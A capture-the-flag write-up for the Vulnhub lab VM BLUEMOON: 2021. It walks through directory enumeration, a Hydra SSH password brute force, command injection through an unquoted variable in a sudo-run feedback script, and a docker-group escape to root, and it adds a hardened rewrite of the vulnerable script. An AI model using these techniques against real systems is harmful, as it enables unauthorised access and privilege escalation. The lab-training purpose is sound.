Vulnhub: BLUEMOON: 2021
BLUEMOON: 2021
This is BLUEMOON: 2021 from Vulnhub. It is easy rated and I picked it to do because someone on the Vulnhub discord was looking for a write-up, which made me think maybe it was challenging. After that - and before I got a chance to do it myself - someone else posted a writeup, but I didn’t read it. Nevertheless, this is going to be super short, because it was pretty simple. Let’s go.
Ports
FTP, SSH and HTTP. No anon on the FTP.
Web
It needs some heavy enumeration to find what we want:
┌──(root💀kali)-[/opt/vulnhub/bluemoon]
└─# feroxbuster -u http://192.168.1.203 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -C 403
by Ben "epi" Risher 🤓 ver: 2.2.1
───────────────────────────┬──────────────────────
🎯 Target Url │ http://192.168.1.203
🚀 Threads │ 50
📖 Wordlist │ /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt
👌 Status Codes │ [200, 204, 301, 302, 307, 308, 401, 403, 405]
💢 Status Code Filters │ [403]
💥 Timeout (secs) │ 7
🦡 User-Agent │ feroxbuster/2.2.1
💉 Config File │ /etc/feroxbuster/ferox-config.toml
🔃 Recursion Depth │ 4
🎉 New Version Available │ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
🏁 Press [ENTER] to use the Scan Cancel Menu™
──────────────────────────────────────────────────
200 45l 109w 1169c http://192.168.1.203/hidden_text
[####################] - 4m 1273785/1273785 0s found:1 errors:1219
[####################] - 4m 1273785/1273785 4912/s http://192.168.1.203
Once we have it, we get a link to a QR code which contains FTP credentials.
FTP
When we login to FTP we get this:
┌──(root💀kali)-[/opt/vulnhub/bluemoon]
└─# ftp 192.168.1.203
Connected to 192.168.1.203.
220 (vsFTPd 3.0.3)
Name (192.168.1.203:root): userftp
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -lash
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwxr-xr-x 2 0 0 4096 Mar 08 00:28 .
drwxr-xr-x 3 1001 1001 4096 Mar 08 00:24 ..
-rw-r--r-- 1 0 0 147 Mar 08 00:27 information.txt
-rw-r--r-- 1 0 0 363 Mar 08 00:28 p_lists.txt
And that contains a username (in the ‘information.txt’) and a list of passwords. Hydra makes short work of it.
┌──(root💀kali)-[/opt/vulnhub/bluemoon]
└─# hydra -l robin -P ./p_lists.txt ssh://192.168.1.203
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-04-18 05:23:25
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 16 tasks per 1 server, overall 16 tasks, 32 login tries (l:1/p:32), ~2 tries per task
[DATA] attacking ssh://192.168.1.203:22/
[22][ssh] host: 192.168.1.203 login: robin password: k4rv3ndh4nh4ck3r
1 of 1 target successfully completed, 1 valid password found
[WARNING] Writing restore file because 2 final worker threads did not complete until end.
[ERROR] 2 targets did not resolve or could not be connected
[ERROR] 0 target did not complete
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-04-18 05:23:32
And we can SSH in.
Robin
Robin can do this:
robin@BlueMoon:~/project$ sudo -l
Matching Defaults entries for robin on bluemoon:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User robin may run the following commands on bluemoon:
(jerry) NOPASSWD: /home/robin/project/feedback.sh
Which is:
robin@BlueMoon:~/project$ cat feedback.sh
#!/bin/bash
clear
echo -e "Script For FeedBack\n"
read -p "Enter Your Name : " name
echo ""
read -p "Enter You FeedBack About This Target Machine : " feedback
echo ""
$feedback 2>/dev/null
echo -e "\nThanks For Your FeedBack...!\n"
In case it’s not obvious, whatever is entered at the second read prompt is run as a command: `$feedback` is expanded unquoted and executed as the command line, with only stderr discarded. I use sh to get a shell as Jerry and then upgrade it with python.
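For contrast, here is a hardened rewrite of that feedback script, written as an added example for this write-up rather than taken from the VM. It treats the input as data only: the value is quoted everywhere, written to a log file (the `FEEDBACK_LOG` path is an assumption for the demo) and never word-split or executed, so a submission like `id; touch /tmp/x` is stored verbatim instead of run.

```shell
#!/bin/sh
# Hardened version of the feedback.sh pattern (added example, not the VM's script).
# The original did `$feedback 2>/dev/null`, executing the user's text as a command.
# Here nothing the user types is ever evaluated by the shell.

FEEDBACK_LOG="${FEEDBACK_LOG:-/tmp/feedback_demo.log}"   # assumed log path for the demo

# record_feedback NAME TEXT
# Appends one tab-separated record. Returns 0 on success, 1 if the input is rejected.
record_feedback() {
    name="$1"
    feedback="$2"
    # Reject an empty name or oversized feedback so the log cannot be flooded.
    if [ -z "$name" ] || [ "${#feedback}" -gt 500 ]; then
        return 1
    fi
    # Flatten newlines (and tabs) so one submission cannot forge extra records.
    name=$(printf '%s' "$name" | tr '\n\t' '  ')
    feedback=$(printf '%s' "$feedback" | tr '\n\t' '  ')
    # Every expansion is quoted and passed as an argument to printf: the text is
    # written verbatim; semicolons, backticks and $(...) inside it are inert.
    printf '%s\t%s\t%s\n' "$(date -u +%Y-%m-%dT%H:%M:%SZ)" "$name" "$feedback" >> "$FEEDBACK_LOG"
}

# feedback_count: number of records currently in the log.
feedback_count() {
    if [ -f "$FEEDBACK_LOG" ]; then
        wc -l < "$FEEDBACK_LOG" | tr -d ' '
    else
        echo 0
    fi
}

# Interactive front end mirroring the original prompts; only runs on a terminal.
if [ -t 0 ]; then
    printf 'Enter Your Name : '
    read -r name
    printf 'Enter Your FeedBack About This Target Machine : '
    read -r feedback
    if record_feedback "$name" "$feedback"; then
        echo "Thanks For Your FeedBack...!"
    else
        echo "Feedback rejected." >&2
        exit 1
    fi
fi
```

Note that the remaining risk is the sudo rule itself: even a safe script becomes a problem if `robin` can edit `/home/robin/project/feedback.sh`, since a rule like `(jerry) NOPASSWD:` on a file in the invoking user's own home directory lets that user run anything as jerry.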
Jerry > root
Jerry is in the docker group:
id
uid=1002(jerry) gid=1002(jerry) groups=1002(jerry),114(docker)
docker run -it -v /:/mnt alpine chroot /mnt
root@a93f401a9aa9:/# id
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
root@a93f401a9aa9:/# id;date;hostname
uid=0(root) gid=0(root) groups=0(root),1(daemon),2(bin),3(sys),4(adm),6(disk),10(uucp),11,20(dialout),26(tape),27(sudo)
Sun Apr 18 01:40:42 PDT 2021
a93f401a9aa9
root@a93f401a9aa9:/#
So that was that, see ya.